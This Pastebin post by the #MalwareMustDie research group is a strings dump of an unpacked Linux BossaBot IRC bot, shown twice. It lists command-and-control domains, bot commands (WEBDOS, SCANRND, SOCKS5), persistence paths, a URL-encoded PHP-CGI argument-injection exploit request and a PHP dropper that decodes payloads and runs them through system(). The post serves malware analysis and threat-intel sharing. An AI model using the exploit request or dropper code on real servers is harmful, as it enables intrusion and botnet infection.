Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie - Last version BossaBot sample (depacked)
- // VT: https://www.virustotal.com/en/file/0f0558ac7bca56a30689ada0b31a7887dbe8046af74fc66812852fb7f3beace7/analysis/1412321840/
- // sample 2 weeks old, attacks: 1 day old
- // pic: malekal
- 0x00001 ELF
- 0x000F4 /lib/ld-linux.so.2
- 0x00114 GNU
- 0x00891 libpthread.so.0
- 0x008A1 waitpid
- 0x008A9 recv
- 0x008AE connect
- 0x008B6 pthread_exit
- 0x008C3 pthread_create
- 0x008D2 send
- 0x008D7 accept
- 0x008DE wait
- 0x008E3 fork
- 0x008E8 sigaction
- 0x008F2 __h_errno_location
- 0x00905 __errno_location
- 0x00916 _Jv_RegisterClasses
- 0x0092A libc.so.6
- 0x00934 strcpy
- 0x0093B ioctl
- 0x00941 stdout
- 0x00948 vsprintf
- 0x00951 snprintf
- 0x0095A __strtol_internal
- 0x0096C getpid
- 0x00973 fgets
- 0x00979 memcpy
- 0x00980 pclose
- 0x00987 perror
- 0x0098E feof
- 0x00993 malloc
- 0x0099A sleep
- 0x009A0 sysinfo
- 0x009A8 socket
- 0x009AF select
- 0x009B6 fflush
- 0x009BD alarm
- 0x009C3 popen
- 0x009C9 calloc
- 0x009D0 kill
- 0x009D5 bind
- 0x009DA inet_addr
- 0x009E4 setsockopt
- 0x009EF fseek
- 0x009F5 ferror
- 0x009FC strstr
- 0x00A03 strncpy
- 0x00A0B strcasecmp
- 0x00A16 __strdup
- 0x00A1F bcopy
- 0x00A25 _IO_getc
- 0x00A2E strtok
- 0x00A35 listen
- 0x00A3C sscanf
- 0x00A43 fread
- 0x00A49 memset
- 0x00A50 ftell
- 0x00A56 srand
- 0x00A5C getppid
- 0x00A64 time
- 0x00A69 getcwd
- 0x00A70 gethostbyname
- 0x00A7E fclose
- 0x00A85 hstrerror
- 0x00A8F fwrite
- 0x00A96 rewind
- 0x00A9D inet_ntop
- 0x00AA7 fopen
- 0x00AAD _IO_putc
- 0x00AB6 __ctype_toupper_loc
- 0x00ACA _IO_stdin_used
- 0x00AD9 daemon
- 0x00AE0 __libc_start_main
- 0x00AF2 fputs
- 0x00AF8 vfprintf
- 0x00B01 free
- 0x00B06 __gmon_start__
- 0x00B15 GLIBC_2.1
- 0x00B1F GLIBC_2.0
- 0x00B29 GLIBC_2.3
- 0x013A8 PTRh
- 0x013B5 QVh
- 0x01453 WVS
- 0x0154C IQh
- 0x01563 WVS
- 0x015E6 G -
- 0x01624 5~w=
- 0x0162F 6~l=
- 0x0163A 7~a=
- 0x01645 8~V=
- 0x01650 9~K=
- 0x01661 G ]
- 0x01667 -~4=
- 0x01672 5~)=
- 0x016AB WVS
- 0x016C7 tOVj
- 0x016CF RPf
- 0x0181B tP<
- 0x0182A t7<
- 0x0187B WVS
- 0x01895 XZh*
- 0x01904 SWj
- 0x01B43 QVP
- 0x01BD6 RVS
- 0x01BEF IQS
- 0x01C8B WVS
- 0x01EF7 WVS
- 0x02250 RSV
- 0x02267 WVS
- 0x022BD C$f
- 0x022D9 Htl
- 0x0234C S(RV
- 0x02360 S(R
- 0x02376 j.V
- 0x0238B WVS
- 0x0241F Z P
- 0x0243B Qh
- 0x02457 V(R
- 0x02561 V(R
- 0x0265F WVS
- 0x0287B WVS
- 0x02990 QSW
- 0x02A3F WVS
- 0x02B23 4;V
- 0x02B30 tZC
- 0x02BDB WVS
- 0x02CBF 4;V
- 0x02CCC tZC
- 0x02D77 WVS
- 0x02E3F t9Ku
- 0x02FC7 WVS
- 0x02FE8 QSV
- 0x030A7 PSh
- 0x03113 WVS
- 0x03133 : t
- 0x03144 CI9
- 0x03176 8!t"
- 0x0318D CI9
- 0x03197 <;!u
- 0x031AA 8!t
- 0x03207 8 t'
- 0x03220 CI9
- 0x0322D <3 u
- 0x03302 XZh
- 0x0340F < t
- 0x0341E CB9
- 0x0344D <;
- 0x03462 CI9
- 0x034DC 8 t&
- 0x034F4 CI9
- 0x03501 <; u
- 0x0358E WHP
- 0x035FF WVS
- 0x03625 I9M
- 0x0362C ; t"
- 0x03646 IC9M
- 0x0364E ; u
- 0x03661 IC9M
- 0x0368B ; t%
- 0x036A5 I9M
- 0x03702 I9M
- 0x03709 ; t!
- 0x03722 IC9M
- 0x0372A ; u
- 0x0373D IC9M
- 0x03767 ; t#
- 0x0377F I9M
- 0x037A4 @t7
- 0x0380B WVS
- 0x038B4 Rh!T
- 0x038F3 w@
- 0x0391D jt6
- 0x03989 j j
- 0x039DB WVS
- 0x039F9 ZYh/
- 0x03A2E _h*
- 0x03A3E Y[h/
- 0x03A72 XZh
- 0x03AF9 PWhU
- 0x03B23 u&PSh
- 0x03B62 XZh]
- 0x03BB8 IQh_
- 0x03BE8 WIQj
- 0x03CCB Q@P
- 0x03DA6 ;=H
- 0x03E8A > t
- 0x03E9D CI9
- 0x03EA4 <3 u
- 0x03F77 CI9
- 0x03F7E <3 u
- 0x03FFF WVS
- 0x040FF WVS1
- 0x0418A VS1
- 0x042EB WVS
- 0x04306 XZh/
- 0x04316 WPV
- 0x0433F WVS
- 0x0435B Xh/
- 0x0436A WPV
- 0x043CE PRh
- 0x04487 WVS
- 0x044A9 :!t#
- 0x044C1 I9M
- 0x044F1 8:t2
- 0x045E8 srv5050.co
- 0x045F3 ka3ek.com
- 0x045FD ircqfrum.com
- 0x0460A 8rb.su
- 0x04611 %s : USERID : UNIX : %s
- 0x0462D /tmp/ReV1112.z
- 0x0463C /tmp/ReV11122.z
- 0x0464C /cgi-bin/php
- 0x04659 /cgi-bin/php5
- 0x04667 /cgi-bin/php-cgi
- 0x04678 /cgi-bin/php5-cgi
- 0x0468A /cgi-bin/php-cgi.bin
- 0x0469F /tmp
- 0x046A4 NOTICE %s :EX %s T %s
- 0x046BB NOTICE %s :rnd %s t %s t %s
- 0x046D8 %d.%d.%d.%d
- 0x046E4 NOTICE %s :WT
- 0x046F3 NOTICE %s :SD
- 0x04702 NOTICE %s :rnd2 %s t %s t %s
- 0x04720 %hu.%hu.%hu.%hu
- 0x04730 NOTICE %s :S5 %d
- 0x04742 b64:000:Invalid Message Code.
- 0x04760 GET %s HTTP/1.0
- 0x04774 NOTICE %s :request=[%s]
- 0x0478D close error
- 0x04799 WEBDOS
- 0x047A0 SERVER
- 0x047A7 SCANRND
- 0x047AF SCANRND2
- 0x047B8 MOVE
- 0x047BD SOCKS5
- 0x047C4 IRC
- 0x047C9 NOTICE %s :Unable to comply.
- 0x047E7 SH
- 0x047EB NOTICE %s :%s
- 0x047FA 352
- 0x047FE 376
- 0x04802 433
- 0x04806 422
- 0x0480A PRIVMSG
- 0x04812 PING
- 0x04817 NICK
- 0x0481C TOPIC
- 0x04822 /tmp/ReV1112
- 0x04832 /tmp/ReV11122
- 0x04840 /etc/init.d/rc.local
- 0x04855 "%s%s"
- 0x0485F -bash
- 0x04865 #rev
- 0x0486D ERROR
- 0x04873 /etc/rc.conf
- 0x04880 NOTICE %s :MOVE <server>
- 0x0489A MODE %s -x
- 0x048A6 MODE %s +i
- 0x048B2 JOIN %s :%s
- 0x048BF WHO %s
- 0x048C7 PONG %s
- 0x048E0 POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%7%6E HTTP/10x04CBF 0x04CBF Host: %s
- 0x04CC9 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
- 0x04D18 Content-Type: application/x-www-form-urlencoded
- 0x04D49 Content-Length: %d
- 0x04D5D Connection: close
- 0x04D80 <?php
- 0x04D86 $bufferf = '%s';
- 0x04D97 $bufferf2 = '%s';
- 0x075A9 LCJbXDJUY3BGbG9vZCBGaW5pc2hlZCFcMl06IENvbmZpZyAtCiAKJHBhY2tldHMgcGFjb3RlcyBwYXJhICRob3N0OiRwb3J0LiIpOwp9Cn0KIAokYm90ID0gbmV3IHBCb3Q7CiRib3QtPnN0YXJ0KCk7CiAKPz4K';
- 0x0764C $Vdkqrxiiyr3t = sys_get_temp_dir();
- 0x07670 $Vgxl4ifsipo5 = getcwd();
- 0x0768A $Vos03apkyec1 = "ReV1112";
- 0x076A5 $Vos03apkyec2 = "ReV11122";
- 0x076C1 $Vos03apkyec3 = "WOP";
- 0x076D8 $V5lgt4awdv3b = "chmod 777";
- 0x076F5 $V5lgt4awdv3c = "php";
- 0x0770C if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))
- 0x07741 exit(1);
- 0x0774A }else{
- 0x07751 echo($Vdkqrxiiyr3t);
- 0x07766 $bufferf = base64_decode($bufferf);
- 0x0778A $bufferf2 = base64_decode($bufferf2);
- 0x077B0 $wop = base64_decode($wop);
- 0x077CC file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);
- 0x07808 file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);
- 0x07845 file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec3", $wop);
- 0x0787D chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);
- 0x078AB system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");
- 0x078E7 chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);
- 0x07915 system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");
- 0x07951 system($Vdkqrxiiyr3t . "/$Vos03apkyec2");
- 0x0797B system($Vdkqrxiiyr3t . "/$Vos03apkyec1");
- 0x079A5 system("$V5lgt4awdv3c " . $Vdkqrxiiyr3t . "/$Vos03apkyec3");
- 0x079E2 exit(1);
- 0x07A00 b64:001:Syntax Error -- check help (-h) for usage.
- 0x07A40 b64:002:File Error Opening/Creating Files.
- 0x07A80 b64:003:File I/O Error -- Note: output file not removed.
- 0x07AC0 b64:004:Error on output file close.
- 0x07B00 b64:005:linesize set to minimum.
- 0x07B40 b64:006:Syntax: Too many arguments.
- 0x07B80 gethostbyname() error for host:%s:%s
- 0x07BC0 export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
- 0x07C00 NICK %s
- 0x07C08 USER %s localhost localhost :%s
- 0x07C3F >ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
- 0x07CA0 |$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]
- 0x07CDF abcdefghijklmnopq
- 0x08341 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08374 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x083A7 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x083DA GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x0840D GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08440 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08473 .shstrtab
- 0x0847D .interp
- 0x08485 .note.ABI-tag
- 0x08493 .hash
- 0x08499 .dynsym
- 0x084A1 .dynstr
- 0x084A9 .gnu.version
- 0x084B6 .gnu.version_r
- 0x084C5 .rel.dyn
- 0x084CE .rel.plt
- 0x084D7 .init
- 0x084DD .text
- 0x084E3 .fini
- 0x084E9 .rodata
- 0x084F1 .eh_frame
- 0x084FB .data
- 0x08501 .dynamic
- 0x0850A .ctors
- 0x08511 .dtors
- 0x08518 .jcr
- 0x0851D .got
- 0x08522 .bss
- 0x08527 .comment
- 0x00001 ELF
- 0x000F4 /lib/ld-linux.so.2
- 0x00114 GNU
- 0x00891 libpthread.so.0
- 0x008A1 waitpid
- 0x008A9 recv
- 0x008AE connect
- 0x008B6 pthread_exit
- 0x008C3 pthread_create
- 0x008D2 send
- 0x008D7 accept
- 0x008DE wait
- 0x008E3 fork
- 0x008E8 sigaction
- 0x008F2 __h_errno_location
- 0x00905 __errno_location
- 0x00916 _Jv_RegisterClasses
- 0x0092A libc.so.6
- 0x00934 strcpy
- 0x0093B ioctl
- 0x00941 stdout
- 0x00948 vsprintf
- 0x00951 snprintf
- 0x0095A __strtol_internal
- 0x0096C getpid
- 0x00973 fgets
- 0x00979 memcpy
- 0x00980 pclose
- 0x00987 perror
- 0x0098E feof
- 0x00993 malloc
- 0x0099A sleep
- 0x009A0 sysinfo
- 0x009A8 socket
- 0x009AF select
- 0x009B6 fflush
- 0x009BD alarm
- 0x009C3 popen
- 0x009C9 calloc
- 0x009D0 kill
- 0x009D5 bind
- 0x009DA inet_addr
- 0x009E4 setsockopt
- 0x009EF fseek
- 0x009F5 ferror
- 0x009FC strstr
- 0x00A03 strncpy
- 0x00A0B strcasecmp
- 0x00A16 __strdup
- 0x00A1F bcopy
- 0x00A25 _IO_getc
- 0x00A2E strtok
- 0x00A35 listen
- 0x00A3C sscanf
- 0x00A43 fread
- 0x00A49 memset
- 0x00A50 ftell
- 0x00A56 srand
- 0x00A5C getppid
- 0x00A64 time
- 0x00A69 getcwd
- 0x00A70 gethostbyname
- 0x00A7E fclose
- 0x00A85 hstrerror
- 0x00A8F fwrite
- 0x00A96 rewind
- 0x00A9D inet_ntop
- 0x00AA7 fopen
- 0x00AAD _IO_putc
- 0x00AB6 __ctype_toupper_loc
- 0x00ACA _IO_stdin_used
- 0x00AD9 daemon
- 0x00AE0 __libc_start_main
- 0x00AF2 fputs
- 0x00AF8 vfprintf
- 0x00B01 free
- 0x00B06 __gmon_start__
- 0x00B15 GLIBC_2.1
- 0x00B1F GLIBC_2.0
- 0x00B29 GLIBC_2.3
- 0x013A8 PTRh
- 0x013B5 QVh
- 0x01453 WVS
- 0x0154C IQh
- 0x01563 WVS
- 0x015E6 G -
- 0x01624 5~w=
- 0x0162F 6~l=
- 0x0163A 7~a=
- 0x01645 8~V=
- 0x01650 9~K=
- 0x01661 G ]
- 0x01667 -~4=
- 0x01672 5~)=
- 0x016AB WVS
- 0x016C7 tOVj
- 0x016CF RPf
- 0x0181B tP<
- 0x0182A t7<
- 0x0187B WVS
- 0x01895 XZh*
- 0x01904 SWj
- 0x01B43 QVP
- 0x01BD6 RVS
- 0x01BEF IQS
- 0x01C8B WVS
- 0x01EF7 WVS
- 0x02250 RSV
- 0x02267 WVS
- 0x022BD C$f
- 0x022D9 Htl
- 0x0234C S(RV
- 0x02360 S(R
- 0x02376 j.V
- 0x0238B WVS
- 0x0241F Z P
- 0x0243B Qh
- 0x02457 V(R
- 0x02561 V(R
- 0x0265F WVS
- 0x0287B WVS
- 0x02990 QSW
- 0x02A3F WVS
- 0x02B23 4;V
- 0x02B30 tZC
- 0x02BDB WVS
- 0x02CBF 4;V
- 0x02CCC tZC
- 0x02D77 WVS
- 0x02E3F t9Ku
- 0x02FC7 WVS
- 0x02FE8 QSV
- 0x030A7 PSh
- 0x03113 WVS
- 0x03133 : t
- 0x03144 CI9
- 0x03176 8!t"
- 0x0318D CI9
- 0x03197 <;!u
- 0x031AA 8!t
- 0x03207 8 t'
- 0x03220 CI9
- 0x0322D <3 u
- 0x03302 XZh
- 0x0340F < t
- 0x0341E CB9
- 0x0344D <;
- 0x03462 CI9
- 0x034DC 8 t&
- 0x034F4 CI9
- 0x03501 <; u
- 0x0358E WHP
- 0x035FF WVS
- 0x03625 I9M
- 0x0362C ; t"
- 0x03646 IC9M
- 0x0364E ; u
- 0x03661 IC9M
- 0x0368B ; t%
- 0x036A5 I9M
- 0x03702 I9M
- 0x03709 ; t!
- 0x03722 IC9M
- 0x0372A ; u
- 0x0373D IC9M
- 0x03767 ; t#
- 0x0377F I9M
- 0x037A4 @t7
- 0x0380B WVS
- 0x038B4 Rh!T
- 0x038F3 w@
- 0x0391D jt6
- 0x03989 j j
- 0x039DB WVS
- 0x039F9 ZYh/
- 0x03A2E _h*
- 0x03A3E Y[h/
- 0x03A72 XZh
- 0x03AF9 PWhU
- 0x03B23 u&PSh
- 0x03B62 XZh]
- 0x03BB8 IQh_
- 0x03BE8 WIQj
- 0x03CCB Q@P
- 0x03DA6 ;=H
- 0x03E8A > t
- 0x03E9D CI9
- 0x03EA4 <3 u
- 0x03F77 CI9
- 0x03F7E <3 u
- 0x03FFF WVS
- 0x040FF WVS1
- 0x0418A VS1
- 0x042EB WVS
- 0x04306 XZh/
- 0x04316 WPV
- 0x0433F WVS
- 0x0435B Xh/
- 0x0436A WPV
- 0x043CE PRh
- 0x04487 WVS
- 0x044A9 :!t#
- 0x044C1 I9M
- 0x044F1 8:t2
- 0x045E8 srv5050.co
- 0x045F3 ka3ek.com
- 0x045FD ircqfrum.com
- 0x0460A 8rb.su
- 0x04611 %s : USERID : UNIX : %s
- 0x0462D /tmp/ReV1112.z
- 0x0463C /tmp/ReV11122.z
- 0x0464C /cgi-bin/php
- 0x04659 /cgi-bin/php5
- 0x04667 /cgi-bin/php-cgi
- 0x04678 /cgi-bin/php5-cgi
- 0x0468A /cgi-bin/php-cgi.bin
- 0x0469F /tmp
- 0x046A4 NOTICE %s :EX %s T %s
- 0x046BB NOTICE %s :rnd %s t %s t %s
- 0x046D8 %d.%d.%d.%d
- 0x046E4 NOTICE %s :WT
- 0x046F3 NOTICE %s :SD
- 0x04702 NOTICE %s :rnd2 %s t %s t %s
- 0x04720 %hu.%hu.%hu.%hu
- 0x04730 NOTICE %s :S5 %d
- 0x04742 b64:000:Invalid Message Code.
- 0x04760 GET %s HTTP/1.0
- 0x04774 NOTICE %s :request=[%s]
- 0x0478D close error
- 0x04799 WEBDOS
- 0x047A0 SERVER
- 0x047A7 SCANRND
- 0x047AF SCANRND2
- 0x047B8 MOVE
- 0x047BD SOCKS5
- 0x047C4 IRC
- 0x047C9 NOTICE %s :Unable to comply.
- 0x047E7 SH
- 0x047EB NOTICE %s :%s
- 0x047FA 352
- 0x047FE 376
- 0x04802 433
- 0x04806 422
- 0x0480A PRIVMSG
- 0x04812 PING
- 0x04817 NICK
- 0x0481C TOPIC
- 0x04822 /tmp/ReV1112
- 0x04832 /tmp/ReV11122
- 0x04840 /etc/init.d/rc.local
- 0x04855 "%s%s"
- 0x0485F -bash
- 0x04865 #rev
- 0x0486D ERROR
- 0x04873 /etc/rc.conf
- 0x04880 NOTICE %s :MOVE <server>
- 0x0489A MODE %s -x
- 0x048A6 MODE %s +i
- 0x048B2 JOIN %s :%s
- 0x048BF WHO %s
- 0x048C7 PONG %s
- 0x048E0 POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%7%6E HTTP/10x04CBF 0x04CBF Host: %s
- 0x04CC9 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
- 0x04D18 Content-Type: application/x-www-form-urlencoded
- 0x04D49 Content-Length: %d
- 0x04D5D Connection: close
- 0x04D80 <?php
- 0x04D86 $bufferf = '%s';
- 0x04D97 $bufferf2 = '%s';
- 0x075A9 LCJbXDJUY3BGbG9vZCBGaW5pc2hlZCFcMl06IENvbmZpZyAtCiAKJHBhY2tldHMgcGFjb3RlcyBwYXJhICRob3N0OiRwb3J0LiIpOwp9Cn0KIAokYm90ID0gbmV3IHBCb3Q7CiRib3QtPnN0YXJ0KCk7CiAKPz4K';
- 0x0764C $Vdkqrxiiyr3t = sys_get_temp_dir();
- 0x07670 $Vgxl4ifsipo5 = getcwd();
- 0x0768A $Vos03apkyec1 = "ReV1112";
- 0x076A5 $Vos03apkyec2 = "ReV11122";
- 0x076C1 $Vos03apkyec3 = "WOP";
- 0x076D8 $V5lgt4awdv3b = "chmod 777";
- 0x076F5 $V5lgt4awdv3c = "php";
- 0x0770C if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))
- 0x07741 exit(1);
- 0x0774A }else{
- 0x07751 echo($Vdkqrxiiyr3t);
- 0x07766 $bufferf = base64_decode($bufferf);
- 0x0778A $bufferf2 = base64_decode($bufferf2);
- 0x077B0 $wop = base64_decode($wop);
- 0x077CC file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);
- 0x07808 file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);
- 0x07845 file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec3", $wop);
- 0x0787D chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);
- 0x078AB system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");
- 0x078E7 chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);
- 0x07915 system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");
- 0x07951 system($Vdkqrxiiyr3t . "/$Vos03apkyec2");
- 0x0797B system($Vdkqrxiiyr3t . "/$Vos03apkyec1");
- 0x079A5 system("$V5lgt4awdv3c " . $Vdkqrxiiyr3t . "/$Vos03apkyec3");
- 0x079E2 exit(1);
- 0x07A00 b64:001:Syntax Error -- check help (-h) for usage.
- 0x07A40 b64:002:File Error Opening/Creating Files.
- 0x07A80 b64:003:File I/O Error -- Note: output file not removed.
- 0x07AC0 b64:004:Error on output file close.
- 0x07B00 b64:005:linesize set to minimum.
- 0x07B40 b64:006:Syntax: Too many arguments.
- 0x07B80 gethostbyname() error for host:%s:%s
- 0x07BC0 export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
- 0x07C00 NICK %s
- 0x07C08 USER %s localhost localhost :%s
- 0x07C3F >ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
- 0x07CA0 |$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]
- 0x07CDF abcdefghijklmnopq
- 0x08341 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08374 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x083A7 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x083DA GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x0840D GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08440 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08473 .shstrtab
- 0x0847D .interp
- 0x08485 .note.ABI-tag
- 0x08493 .hash
- 0x08499 .dynsym
- 0x084A1 .dynstr
- 0x084A9 .gnu.version
- 0x084B6 .gnu.version_r
- 0x084C5 .rel.dyn
- 0x084CE .rel.plt
- 0x084D7 .init
- 0x084DD .text
- 0x084E3 .fini
- 0x084E9 .rodata
- 0x084F1 .eh_frame
- 0x084FB .data
- 0x08501 .dynamic
- 0x0850A .ctors
- 0x08511 .dtors
- 0x08518 .jcr
- 0x0851D .got
- 0x08522 .bss
- 0x08527 .comment
- ---
- #MalwareMustDie!
Add Comment
Please, Sign In to add comment